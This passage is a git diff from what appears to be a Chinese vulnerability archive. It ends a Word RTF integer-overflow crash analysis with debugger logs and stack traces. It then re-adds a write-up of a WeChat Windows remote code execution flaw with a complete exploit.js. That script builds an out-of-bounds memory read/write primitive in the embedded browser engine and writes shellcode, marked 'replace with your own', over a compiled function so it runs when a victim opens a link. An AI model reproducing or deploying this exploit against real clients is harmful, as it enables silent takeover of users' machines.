Edx: %p from 0x%x + 0x%x*2\\n \", (ecx + edx*2),ecx,edx; gc" +bp wwlib+2F00D5 ".printf \" Target addr: %p from 0x%x + 0x%x*2 + 4\\n \", (esi+edx*2+4),esi,edx; gc" +``` + +崩溃前断点记录到的存储过程信息。 + +``` + ... + --------------------------------------------------------------------------------------- + Cum: 00007fec Font id: 00007fec Target addr: 3b3e0044 from 0x3b3d0068 + 0x7fec*2 + 4 + Base: 00007fee + Edx: 00017fc8 from 0x7fec + 0x7fee*2 + Target addr: 3b3ffffc from 0x3b3d0068 + 0x17fc8*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007fed Font id: 00007fed Target addr: 3b3e0046 from 0x3b3d0068 + 0x7fed*2 + 4 + Base: 00007fee + Edx: 00017fc9 from 0x7fed + 0x7fee*2 + Target addr: 3b3ffffe from 0x3b3d0068 + 0x17fc9*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007fee Font id: 00007fee Target addr: 3e538008 from 0x3e528028 + 0x7fee*2 + 4 + Base: 00007ff8 + Edx: 00017fde from 0x7fee + 0x7ff8*2 + Target addr: 3e557fe8 from 0x3e528028 + 0x17fde*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007fef Font id: 00007fef Target addr: 3e53800a from 0x3e528028 + 0x7fef*2 + 4 + Base: 00007ff8 + Edx: 00017fdf from 0x7fef + 0x7ff8*2 + Target addr: 3e557fea from 0x3e528028 + 0x17fdf*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff0 Font id: 00007ff0 Target addr: 3e53800c from 0x3e528028 + 0x7ff0*2 + 4 + Base: 00007ff8 + Edx: 00017fe0 from 0x7ff0 + 0x7ff8*2 + Target addr: 3e557fec from 0x3e528028 + 0x17fe0*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff1 Font id: 00007ff1 Target addr: 3e53800e from 0x3e528028 + 0x7ff1*2 + 4 + Base: 00007ff8 + Edx: 00017fe1 from 0x7ff1 + 0x7ff8*2 + Target addr: 3e557fee from 0x3e528028 + 0x17fe1*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff2 Font id: 00007ff2 Target addr: 3e538010 from 0x3e528028 + 0x7ff2*2 + 4 + Base: 00007ff8 + Edx: 00017fe2 from 0x7ff2 + 0x7ff8*2 + Target addr: 3e557ff0 from 0x3e528028 + 0x17fe2*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff3 Font id: 00007ff3 Target addr: 3e538012 from 0x3e528028 + 0x7ff3*2 + 4 + Base: 00007ff8 + Edx: 00017fe3 from 0x7ff3 + 0x7ff8*2 + Target addr: 3e557ff2 from 0x3e528028 + 0x17fe3*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff4 Font id: 00007ff4 Target addr: 3e538014 from 0x3e528028 + 0x7ff4*2 + 4 + Base: 00007ff8 + Edx: 00017fe4 from 0x7ff4 + 0x7ff8*2 + Target addr: 3e557ff4 from 0x3e528028 + 0x17fe4*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff5 Font id: 00007ff5 Target addr: 3e538016 from 0x3e528028 + 0x7ff5*2 + 4 + Base: 00007ff8 + Edx: 00017fe5 from 0x7ff5 + 0x7ff8*2 + Target addr: 3e557ff6 from 0x3e528028 + 0x17fe5*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff6 Font id: 00007ff6 Target addr: 3e538018 from 0x3e528028 + 0x7ff6*2 + 4 + Base: 00007ff8 + Edx: 00017fe6 from 0x7ff6 + 0x7ff8*2 + Target addr: 3e557ff8 from 0x3e528028 + 0x17fe6*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff7 Font id: 00007ff7 Target addr: 3e53801a from 0x3e528028 + 0x7ff7*2 + 4 + Base: 00007ff8 + Edx: 00017fe7 from 0x7ff7 + 0x7ff8*2 + Target addr: 3e557ffa from 0x3e528028 + 0x17fe7*2 + 4 + --------------------------------------------------------------------------------------- + Cum: 00007ff8 Font id: 00007ff8 Target addr: 362defe4 from 0x362ceff0 + 0x7ff8*2 + 4 + Base: 00008002 + Edx: ffff7ffc from 0x7ff8 + 0xffff8002*2 + Target addr: 362befec from 0x362ceff0 + 0xffff7ffc*2 + 4 +``` + +观察记录及断点处的汇编代码,发现崩溃是由 bp2 处的 movsx 指令引起的整数溢出导致。 + +![图片](images/640-16787604735695.png) + +由上图中的记录 2 可以发现,bp2 处获得的 Base 由 0x8002 变为了 edx 中的 0xffff8002,变化的原因是 movsx 指令是带符号扩展的,而 0x8002 的最高位又恰好为 1。这也就导致 bp3 处的 edx 和 bp4 处的 Target addr 整数溢出,并最终在 bp4 处发生堆损坏。 + +![图片](images/640-16787604818848.jpeg) + +Target addr 整数溢出。 + +![图片](images/640-167876049401111.jpeg) + +## 补丁分析 + +将 Office 更新到最新后再次打开 POC.rtf 发现依然会造成崩溃,不过此崩溃是 winword.exe 提前检测到即将造成堆损坏而主动引发的,另外发现微软提供了此版本 wwlib.dll 的符号文件,此栈回溯与之前的基本一致。 + +``` +(174c.149c): Security check failure or stack buffer overrun - code c0000409 (!!! second chance !!!) +eax=00008002 ebx=00007ff8 ecx=00000005 edx=ffffffff esi=7e221028 edi=00007ff8 +eip=6cccec57 esp=004f10f4 ebp=004f110c iopl=0 nv up ei pl nz ac pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 +wwlib!FSearchFtcmap+0x182: +6cccec57 cd29 int 29h +0:000> kv + # ChildEBP RetAddr Args to Child +00 004f110c 6d9f1494 004f119c 00000001 004f1188 wwlib!FSearchFtcmap+0x182 (FPO: [Non-Fpo]) +01 004f35d8 6d9e347e bb594bde 1c597028 0005d400 wwlib!RtfInRare+0x1848 (FPO: [Non-Fpo]) +02 004f3a0c 6d9ff40f 00000070 1c597028 505daa50 wwlib!CchRtfInCore+0x28df (FPO: [Non-Fpo]) +03 004f3c5c 6d9fecc4 1c59702c 004fa0d0 004f5a60 wwlib!RtfGetChars+0x183 (FPO: [Non-Fpo]) +04 004f3ca8 6c97a74a 40280000 00200002 56b28f10 wwlib!PdodCreateRtf+0x177 (FPO: [6,13,4]) +05 004f5404 6c528610 04012000 20280000 00200002 wwlib!`Mso::Details::SharedMutexPool::Get'::`2'::`dynamic atexit destructor for 's_mutexPool''+0x15be8d +06 004f5758 6c52829b 00000000 ffffffff 00000000 wwlib!PdodCreatePfnCore+0x33a (FPO: [Non-Fpo]) +07 004f57dc 6c504161 00000000 ffffffff 00000000 wwlib!PdodCreatePfnBPPaapWithEdpi+0x75 (FPO: [18,3,4]) +08 004f8df4 6c5001b5 04012000 00000000 00000002 wwlib!PdodOpenFnmCore2+0x22eb (FPO: [Non-Fpo]) +09 004f8ebc 6d2d3628 04012000 00000000 00000002 wwlib!PdodOpenFnmCore+0xb9 (FPO: [15,30,0]) +0a 004f9fe8 6d2d332e 00000000 00000000 00000002 wwlib!FFileOpenXszCore+0x2e7 (FPO: [Non-Fpo]) +0b 004fa024 6c7b525d 00000000 00000000 00000002 wwlib!FFileOpenXstzCore+0x3d (FPO: [6,4,0]) +0c 004fb4c4 6c3cc272 00000001 00000000 6c3cc22c wwlib!IfrInitArgs+0x7ef (FPO: [Non-Fpo]) +0d 004fb6fc 6c309720 bb59c6ba 74cda210 0000000a wwlib!Boot::IfrParseCommandLine2+0x46 (FPO: [Non-Fpo]) +0e 004fb774 6c309542 004fb7a4 6c300000 6c309234 wwlib!Boot::FRun+0xb4 (FPO: [Non-Fpo]) +0f 004ff830 6c309298 83385031 00000540 bb5989b6 wwlib!FWordBoot+0x5a (FPO: [Non-Fpo]) +10 004ff864 00941917 00940000 00000000 0000000a wwlib!FMain+0x64 (FPO: [Non-Fpo]) +11 004ffab4 0094114a 00940000 00000000 0077efd4 winword!WinMain+0x146 (FPO: [Non-Fpo]) +12 004ffb00 74cd62c4 003e5000 74cd62a0 454ba229 winword!std::_Deallocate<8,0>+0x1e3 (FPO: [Non-Fpo]) +13 004ffb14 77ae0fa9 003e5000 11605f5b 00000000 KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo]) +14 004ffb5c 77ae0f74 ffffffff 77b02ed1 00000000 ntdll!__RtlUserThreadStart+0x2f (FPO: [SEH]) +15 004ffb6c 00000000 00941000 003e5000 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo]) +``` + +补丁文件中新增的范围检测。 + ![图片](images/640-167876051833114.png) \ No newline at end of file diff --git a/其他漏洞/微信客户端 远程命令执行漏洞.md b/其他漏洞/微信客户端 远程命令执行漏洞.md index 3acf096..fc693f9 100644 --- a/其他漏洞/微信客户端 远程命令执行漏洞.md +++ b/其他漏洞/微信客户端 远程命令执行漏洞.md @@ -1,196 +1,196 @@ -# 微信客户端 远程命令执行漏洞 - -## 漏洞描述 - -微信客户端存在远程命令执行漏洞。目前已经发现在野利用,受害者点击链接就会中招,微信Windows PC版进程webchatweb.exe会加载shellcode执行,整个过程无文件落地,无新进程产生,攻击者可以直接获取目标机器权限。 - -参考链接: - -- https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ - -## 漏洞影响 - -``` -微信Windows版 <=3.2.1.141 截止2022年12月最新版为3.8.0.41 -``` - -## 漏洞复现 - -[安恒信息应急响应中心](https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ)分析的攻击链: - -1. 攻击者利用微信(PC版)0day构造恶意的钓鱼链接,通过微信将钓鱼链接发送给目标员工。 -2. 当员工打开攻击者的钓鱼链接时触发该漏洞,从而导致目标员工PC被植入攻击者制作的cobalstrike木马,木马进程为:xxxsoft.exe,同时创建了名为dotnet_v4.3的系统服务。 -3. 随后,攻击者进一步在c:\\ProgramData\目录下放置TxPortMap.exe 扫描工具并利用该工具扫描目标单位内网。 - -exploit.js: - -``` -ENABLE_LOG = true; -IN_WORKER = true; - -// run calc and hang in a loop -var shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的 - -function print(data) { -} - - -var not_optimised_out = 0; -var target_function = (function (value) { - if (value == 0xdecaf0) { - not_optimised_out += 1; - } - not_optimised_out += 1; - not_optimised_out |= 0xff; - not_optimised_out *= 12; -}); - -for (var i = 0; i < 0x10000; ++i) { - target_function(i); -} - - -var g_array; -var tDerivedNCount = 17 * 87481 - 8; -var tDerivedNDepth = 19 * 19; - -function cb(flag) { - if (flag == true) { - return; - } - g_array = new Array(0); - g_array[0] = 0x1dbabe * 2; - return 'c01db33f'; -} - -function gc() { - for (var i = 0; i < 0x10000; ++i) { - new String(); - } -} - -function oobAccess() { - var this_ = this; - this.buffer = null; - this.buffer_view = null; - - this.page_buffer = null; - this.page_view = null; - - this.prevent_opt = []; - - var kSlotOffset = 0x1f; - var kBackingStoreOffset = 0xf; - - class LeakArrayBuffer extends ArrayBuffer { - constructor() { - super(0x1000); - this.slot = this; - } - } - - this.page_buffer = new LeakArrayBuffer(); - this.page_view = new DataView(this.page_buffer); - - new RegExp({ toString: function () { return 'a' } }); - cb(true); - - class DerivedBase extends RegExp { - constructor() { - // var array = null; - super( - // at this point, the 4-byte allocation for the JSRegExp `this` object - // has just happened. - { - toString: cb - }, 'g' - // now the runtime JSRegExp constructor is called, corrupting the - // JSArray. - ); - - // this allocation will now directly follow the FixedArray allocation - // made for `this.data`, which is where `array.elements` points to. - this_.buffer = new ArrayBuffer(0x80); - g_array[8] = this_.page_buffer; - } - } - - // try{ - var derived_n = eval(`(function derived_n(i) { - if (i == 0) { - return DerivedBase; - } - - class DerivedN extends derived_n(i-1) { - constructor() { - super(); - return; - ${"this.a=0;".repeat(tDerivedNCount)} - } - } - - return DerivedN; - })`); - - gc(); - - - new (derived_n(tDerivedNDepth))(); - - this.buffer_view = new DataView(this.buffer); - this.leakPtr = function (obj) { - this.page_buffer.slot = obj; - return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); - } - - this.setPtr = function (addr) { - this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); - } - - this.read32 = function (addr) { - this.setPtr(addr); - return this.page_view.getUint32(0, true, ...this.prevent_opt); - } - - this.write32 = function (addr, value) { - this.setPtr(addr); - this.page_view.setUint32(0, value, true, ...this.prevent_opt); - } - - this.write8 = function (addr, value) { - this.setPtr(addr); - this.page_view.setUint8(0, value, ...this.prevent_opt); - } - - this.setBytes = function (addr, content) { - for (var i = 0; i < content.length; i++) { - this.write8(addr + i, content[i]); - } - } - return this; -} - -function trigger() { - var oob = oobAccess(); - - var func_ptr = oob.leakPtr(target_function); - print('[*] target_function at 0x' + func_ptr.toString(16)); - - var kCodeInsOffset = 0x1b; - - var code_addr = oob.read32(func_ptr + kCodeInsOffset); - print('[*] code_addr at 0x' + code_addr.toString(16)); - - oob.setBytes(code_addr, shellcode); - - target_function(0); -} - -try{ - print("start running"); - trigger(); -}catch(e){ - print(e); -} -``` - +# 微信客户端 远程命令执行漏洞 + +## 漏洞描述 + +微信客户端存在远程命令执行漏洞。目前已经发现在野利用,受害者点击链接就会中招,微信Windows PC版进程webchatweb.exe会加载shellcode执行,整个过程无文件落地,无新进程产生,攻击者可以直接获取目标机器权限。 + +参考链接: + +- https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ + +## 漏洞影响 + +``` +微信Windows版 <=3.2.1.141 截止2022年12月最新版为3.8.0.41 +``` + +## 漏洞复现 + +[安恒信息应急响应中心](https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ)分析的攻击链: + +1. 攻击者利用微信(PC版)0day构造恶意的钓鱼链接,通过微信将钓鱼链接发送给目标员工。 +2. 当员工打开攻击者的钓鱼链接时触发该漏洞,从而导致目标员工PC被植入攻击者制作的cobalstrike木马,木马进程为:xxxsoft.exe,同时创建了名为dotnet_v4.3的系统服务。 +3. 随后,攻击者进一步在c:\\ProgramData\目录下放置TxPortMap.exe 扫描工具并利用该工具扫描目标单位内网。 + +exploit.js: + +``` +ENABLE_LOG = true; +IN_WORKER = true; + +// run calc and hang in a loop +var shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的 + +function print(data) { +} + + +var not_optimised_out = 0; +var target_function = (function (value) { + if (value == 0xdecaf0) { + not_optimised_out += 1; + } + not_optimised_out += 1; + not_optimised_out |= 0xff; + not_optimised_out *= 12; +}); + +for (var i = 0; i < 0x10000; ++i) { + target_function(i); +} + + +var g_array; +var tDerivedNCount = 17 * 87481 - 8; +var tDerivedNDepth = 19 * 19; + +function cb(flag) { + if (flag == true) { + return; + } + g_array = new Array(0); + g_array[0] = 0x1dbabe * 2; + return 'c01db33f'; +} + +function gc() { + for (var i = 0; i < 0x10000; ++i) { + new String(); + } +} + +function oobAccess() { + var this_ = this; + this.buffer = null; + this.buffer_view = null; + + this.page_buffer = null; + this.page_view = null; + + this.prevent_opt = []; + + var kSlotOffset = 0x1f; + var kBackingStoreOffset = 0xf; + + class LeakArrayBuffer extends ArrayBuffer { + constructor() { + super(0x1000); + this.slot = this; + } + } + + this.page_buffer = new LeakArrayBuffer(); + this.page_view = new DataView(this.page_buffer); + + new RegExp({ toString: function () { return 'a' } }); + cb(true); + + class DerivedBase extends RegExp { + constructor() { + // var array = null; + super( + // at this point, the 4-byte allocation for the JSRegExp `this` object + // has just happened. + { + toString: cb + }, 'g' + // now the runtime JSRegExp constructor is called, corrupting the + // JSArray. + ); + + // this allocation will now directly follow the FixedArray allocation + // made for `this.data`, which is where `array.elements` points to. + this_.buffer = new ArrayBuffer(0x80); + g_array[8] = this_.page_buffer; + } + } + + // try{ + var derived_n = eval(`(function derived_n(i) { + if (i == 0) { + return DerivedBase; + } + + class DerivedN extends derived_n(i-1) { + constructor() { + super(); + return; + ${"this.a=0;".repeat(tDerivedNCount)} + } + } + + return DerivedN; + })`); + + gc(); + + + new (derived_n(tDerivedNDepth))(); + + this.buffer_view = new DataView(this.buffer); + this.leakPtr = function (obj) { + this.page_buffer.slot = obj; + return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); + } + + this.setPtr = function (addr) { + this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); + } + + this.read32 = function (addr) { + this.setPtr(addr); + return this.page_view.getUint32(0, true, ...this.prevent_opt); + } + + this.write32 = function (addr, value) { + this.setPtr(addr); + this.page_view.setUint32(0, value, true, ...this.prevent_opt); + } + + this.write8 = function (addr, value) { + this.setPtr(addr); + this.page_view.setUint8(0, value, ...this.prevent_opt); + } + + this.setBytes = function (addr, content) { + for (var i = 0; i < content.length; i++) { + this.write8(addr + i, content[i]); + } + } + return this; +} + +function trigger() { + var oob = oobAccess(); + + var func_ptr = oob.leakPtr(target_function); + print('[*] target_function at 0x' + func_ptr.toString(16)); + + var kCodeInsOffset = 0x1b; + + var code_addr = oob.read32(func_ptr + kCodeInsOffset); + print('[*] code_addr at 0x' + code_addr.toString(16)); + + oob.setBytes(code_addr, shellcode); + + target_function(0); +} + +try{ + print("start running"); + trigger(); +}catch(e){ + print(e); +} +``` +